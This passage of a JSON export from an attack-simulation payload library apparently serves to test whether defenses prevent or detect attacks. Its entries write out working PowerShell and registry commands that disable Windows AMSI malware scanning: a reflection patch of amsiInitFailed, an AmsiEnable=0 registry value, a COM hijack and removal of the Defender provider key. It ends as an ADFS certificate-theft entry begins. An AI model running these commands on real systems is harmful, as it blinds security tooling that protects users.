        "attack_pattern_description": "Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.\n\nAccess to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.\n\nThe Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\n\nFinally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)",
        "attack_pattern_external_id": "T1112",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "AMSI Bypass - AMSI InitFailed",
      "payload_description": "Any easy way to bypass AMSI inspection is it patch the dll in memory setting the \"amsiInitFailed\" function to true.\nUpon execution, no output is displayed.\n\nhttps://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "f93ec305-4276-455c-89d5-51adb6737cca",
          "attack_pattern_name": "Disable or Modify Tools",
          "attack_pattern_description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
          "attack_pattern_external_id": "T1562.001",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "psh",
      "payload_cleanup_command": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)\n",
      "payload_elevation_required": false,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "695eed40-e949-40e5-b306-b4031e4154bd",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:47:59.903909Z",
      "payload_updated_at": "2025-06-20T10:16:44.955346Z",
      "command_executor": "psh",
      "command_content": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "f93ec305-4276-455c-89d5-51adb6737cca",
        "attack_pattern_name": "Disable or Modify Tools",
        "attack_pattern_description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
        "attack_pattern_external_id": "T1562.001",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "AMSI Bypass - Create AMSIEnable Reg Key",
      "payload_description": "Threat Actor could disable the AMSI function by adding a registry value name “AmsiEnable” to the registry key “HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable” and set its value to 0.\nRef: https://mostafayahiax.medium.com/hunting-for-amsi-bypassing-methods-9886dda0bf9d\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "f93ec305-4276-455c-89d5-51adb6737cca",
          "attack_pattern_name": "Disable or Modify Tools",
          "attack_pattern_description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
          "attack_pattern_external_id": "T1562.001",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "psh",
      "payload_cleanup_command": "Remove-Item -Path \"HKCU:\\Software\\Microsoft\\Windows Script\\Settings\" -Recurse -Force 2> $null\n",
      "payload_elevation_required": true,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "728eca7b-0444-4f6f-ac36-437e3d751dc0",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:48:00.763227Z",
      "payload_updated_at": "2025-06-20T10:16:46.103701Z",
      "command_executor": "psh",
      "command_content": "New-Item -Path \"HKCU:\\Software\\Microsoft\\Windows Script\\Settings\" -Force | Out-Null\nNew-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows Script\\Settings\" -Name \"AmsiEnable\" -Value 0 -PropertyType DWORD -Force | Out-Null\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "f93ec305-4276-455c-89d5-51adb6737cca",
        "attack_pattern_name": "Disable or Modify Tools",
        "attack_pattern_description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
        "attack_pattern_external_id": "T1562.001",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "AMSI Bypass - Override AMSI via COM",
      "payload_description": "With administrative rights, an adversary can disable AMSI via registry value in HKCU\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist.\nThis is currently being used by AsyncRAT and others. \nhttps://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html\nhttps://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "f93ec305-4276-455c-89d5-51adb6737cca",
          "attack_pattern_name": "Disable or Modify Tools",
          "attack_pattern_description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
          "attack_pattern_external_id": "T1562.001",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "cmd",
      "payload_cleanup_command": "REG DELETE HKCU\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32 /f",
      "payload_elevation_required": true,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "ac0de8fe-a821-499c-ba22-591bbe84b06f",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_tags": [],
      "payload_created_at": "2025-06-28T07:39:47.309677Z",
      "payload_updated_at": "2025-06-28T07:39:47.309677Z",
      "payload_output_parsers": [],
      "command_executor": "cmd",
      "command_content": "REG ADD HKCU\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32 /ve /t REG_SZ /d C:\\IDontExist.dll /f",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "f93ec305-4276-455c-89d5-51adb6737cca",
        "attack_pattern_name": "Disable or Modify Tools",
        "attack_pattern_description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
        "attack_pattern_external_id": "T1562.001",
        "attack_pattern_kill_chain_phases": null
      }
    ]
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "AMSI Bypass - Remove AMSI Provider Reg Key",
      "payload_description": "With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection.\nThis test removes the Windows Defender provider registry key. Upon execution, no output is displayed.\nOpen Registry Editor and navigate to \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\\" to verify that it is gone.\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "f93ec305-4276-455c-89d5-51adb6737cca",
          "attack_pattern_name": "Disable or Modify Tools",
          "attack_pattern_description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
          "attack_pattern_external_id": "T1562.001",
          "attack_pattern_kill_chain_phases": null
        }
      ],
      "payload_cleanup_executor": "psh",
      "payload_cleanup_command": "New-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\" -Name \"{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -ErrorAction Ignore | Out-Null\n",
      "payload_elevation_required": true,
      "payload_arguments": [],
      "payload_prerequisites": [],
      "payload_external_id": "13f09b91-c953-438e-845b-b585e51cac9b",
      "payload_source": "FILIGRAN",
      "payload_expectations": [
        "PREVENTION",
        "DETECTION"
      ],
      "payload_status": "VERIFIED",
      "payload_execution_arch": "ALL_ARCHITECTURES",
      "payload_detection_remediations": [],
      "payload_tags": [],
      "payload_output_parsers": [],
      "payload_created_at": "2025-06-20T09:47:59.922514Z",
      "payload_updated_at": "2025-06-20T10:16:44.976838Z",
      "command_executor": "psh",
      "command_content": "Remove-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -Recurse\n",
      "payload_domains": [
        {
          "domain_name": "Endpoint",
          "domain_color": "#389CFF"
        }
      ]
    },
    "payload_tags": [],
    "payload_attack_patterns": [
      {
        "attack_pattern_id": "f93ec305-4276-455c-89d5-51adb6737cca",
        "attack_pattern_name": "Disable or Modify Tools",
        "attack_pattern_description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) Alternatively, they may add new directories to an endpoint detection and response (EDR) tool’s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
        "attack_pattern_external_id": "T1562.001",
        "attack_pattern_kill_chain_phases": null
      }
    ],
    "payload_arguments_documents": []
  },
  {
    "export_version": 1,
    "native_collection": true,
    "payload_information": {
      "payload_type": "Command",
      "payload_name": "ADFS token signing and encryption certificates theft - Local",
      "payload_description": "Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.\nBased on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.\n",
      "payload_platforms": [
        "Windows"
      ],
      "payload_attack_patterns": [
        {
          "attack_pattern_id": "f339328d-1b5f-430f-a4c6-cb46d18ee79b",
          "attack_pattern_name": "Private Keys",
